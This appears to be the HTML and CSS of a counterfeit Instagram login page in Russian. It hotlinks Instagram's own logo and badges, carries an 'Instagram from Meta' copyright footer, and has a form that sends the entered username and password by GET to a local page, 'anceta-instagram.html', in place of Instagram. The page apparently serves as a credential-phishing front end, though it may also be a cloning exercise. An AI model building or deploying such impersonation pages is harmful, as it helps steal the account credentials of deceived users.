<!DOCTYPE html>
<html lang="ua">
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description" content="">
    <meta name="author" content="">
    <link rel="icon" href="https://static.cdninstagram.com/rsrc.php/v3/yb/r/lswP1OF1o6P.png">
     <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@3.3.7/dist/css/bootstrap.min.css">
    <title>Instagram</title>
  </head>
  <body>

<main class="main">  
	<div class="container">
		<div class="">
			<div class="row">
                <div class="col-md-6">
                	<div class="box1">
                	<img class="img-1" src="png2.jpg" >
                	<img class="img-2" src="png.jpg" >
                </div>
                </div>

                <div class="col-md-6 col-md-offset-0 col-sm-8 col-sm-offset-3 col-xs-12 col-xs-offset-0">
                	<div class="box2">
                	<div class="forma">
                		<div class="forma2">
                			<i style="background-image: url(&quot;https://static.cdninstagram.com/rsrc.php/v3/yr/r/NL0hPV-L09m.png&quot;); background-position: 0px 0px; background-size: 176px 186px; width: 174px; height: 50px; background-repeat: no-repeat; display: inline-block;"></i>
                			<form action="anceta-instagram.html" method="GET">
                				<input type="login" name="username" placeholder="Телефон, имя пользователя или эл.адрес">
                				<input type="password" name="password" minlength="6" maxlength="30" placeholder="Пароль">
                				<button>Войти</button>
                			</form>
                			<div class="p1"></div> <p class="p3">или</p> <div class="p1"></div>
                			<a class="a" href="">Войти через Facebook</a>
                			<a class="a2" href="">Забыли пароль?</a>
                		</div>
                	</div>
                	<div class="forma3">
                		<p class="p">У вас ещё нет аккаунта? <a class="a-p" href="">Зарегистрироваться</a></p>
                	</div>
                <div class="box-box-box">
                	<p class="p2">Установите приложение.</p>
                	<img src="https://static.cdninstagram.com/rsrc.php/v3/yr/r/fDjwyLC88oO.png" alt="" class="img2">
                	<img src="https://static.cdninstagram.com/rsrc.php/v3/yv/r/_UbeIRgTpG-.png" alt="" class="img3">
                </div>
                	</div>
                </div>
			</div>
		</div>
	</div>
</main>

<section class="section">  
	<div class="container">
		<div class="section-control">
			<div class="row">
              <div class="col-md-12">
              	<nav class="nav">
              	<ul class="ul">
              		<li>
              			<a class="a-li" href="">Meta</a>
              		</li>
              		<li>
              			<a class="a-li" href="">Информация</a>
              		</li>
              		<li>
              			<a class="a-li" href="">Блог</a>
              		</li>
              		<li>
              			<a class="a-li" href="">Вакансии</a>
              		</li>
              		<li>
              			<a class="a-li" href="">Помощь</a>
              		</li>
              		<li>
              			<a class="a-li" href="">API</a>
              		</li>
              		<li>
              			<a class="a-li" href="">Конфиденциальность</a>
              		</li>
              		<li>
              			<a class="a-li" href="">Условия</a>
              		</li>
              		<li>
              			<a class="a-li" href="">Популярные аккаунты</a>
              		</li>
              		<li>
              			<a class="a-li" href="">Места</a>
              		</li>
              		<li>
              			<a class="a-li" href="">Instagram Lite</a>
              		</li>
              		<li>
              			<a class="a-li" href="">Загрузка контактов и лица, не являющиеся пользователями</a>
              		</li>
              		<li>
              			<a class="a-li" href="">Русский</a>
              		</li>
              		<li>
              			<a class="a-li" href="">© 2023 Instagram from Meta</a>
              		</li>
              	</ul>
              </nav>
              </div>
			</div>
		</div>
	</div>
</section>

<style>
 html, body{
 	height: 100%;
 }
 .main{
 	height: 90%;
 }
 .box1{
  position: relative;
  display: inline-block;
  width: 38rem;
  top: 4rem;
  right: -13rem;
 }
 .img-1{
   position: absolute;
   left: 0;
   width: 280px;
   top: -2rem;
 }
 .img-2{
   position: absolute;
   right: 0;
   width: 280px;
   border-radius: 3.9rem;
 }

.box2{
	margin-top: 6rem;
	text-align: left;
}
.forma{
	text-align: center;
	border: 1.5px solid rgba(128, 128, 128, 0.5) ;
	border-radius: 3px;
	display: inline-block;
	padding: 4rem 4rem 2rem 4rem;
}
.forma2{
	width: 27rem;
}
input{
	width: 100%;
	display: block;
	outline: none;
	border: 1.5px solid rgba(128, 128, 128, 0.5);
	border-radius: 3px;
	padding: 0.6rem 0.6rem;
	margin: 1rem 0;
}
input::placeholder{
	color: rgba(128, 128, 128, 0.8);
	font-size: 13px;
}
button{
	background-color: rgba(0, 149, 246, 0.8);
	border: none;
	width: 100%;
	border-radius: 5px;
	color: white;
	font-weight: bold;
	font-size: 14px;
	padding: 6px 0;
	margin-top: 8px;
}
.a{
	display: block;
	position: relative;
	color: rgb(56, 81, 133);
	font-weight: bold;
	margin: 1rem 0 1rem;
}
a:hover{
	text-decoration:none;
}
.a::before{
	content: '';
	position: absolute;
	background: url(fac.png);
	background-size: cover;
	top: 0rem;
	left: 2.5rem;
	background-color: red;
	width: 1.8rem;
	height: 1.8rem;
}
.a2{
	color: rgb(0, 55, 107);
	font-size: 13px;
}
.p1, .p3{
 display: inline-block;
 margin: 1rem 0 0 0;
}
.p1{
  background-color: rgba(180, 180, 180, 0.6);
  height: 1px;
  width: 42%;
}
.p3{
	color: rgba(180, 180, 180, 1);
	font-size: 14px;
	position: relative;
	top: 3px;
}
.forma3{
text-align: center;
border: 1.5px solid rgba(128, 128, 128, 0.5) ;
border-radius: 3px;
display: inline-block;
width: 35.5rem;
padding: 2rem 2.7rem 1rem;
margin: 2rem 0;
}
.a-p{

}
.p{

}
.box-box-box{
	width: 35.5rem;
	text-align: center;
	display: block;
}
.p2{
	text-align: center;
}
.img2{
	width: 134px;
	text-align: center;
	margin-right: 2px;
}
.img3{
	width: 110px;
	text-align: center;
	margin-left: 2px;
}
@media(max-width:1200px){
   .box1{
  right: -5rem;
 }
}
@media(max-width: 992px){
	.box1{
		display: none;
	}
}
@media(max-width: 748px){
	.box2, .box3{
		text-align: center;
		display: block;
	}
	.box-box-box{
		display: block;
		margin-left: auto;
		margin-right: auto;
	}
}
@media(max-width: 378px){
	.forma, .forma3{
		border: none;
	}
}
nav{
	width: 95%;
	text-align: center;
	margin-top: 5rem;
}
li{
	list-style-type:none;
	display: inline-block;
}
.a-li{
	color: rgb(142, 142, 142);
	font-size: 12px;
}
button:hover{
	background-image: -webkit-linear-gradient(top, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.2));
}
</style>

  </body>
</html>
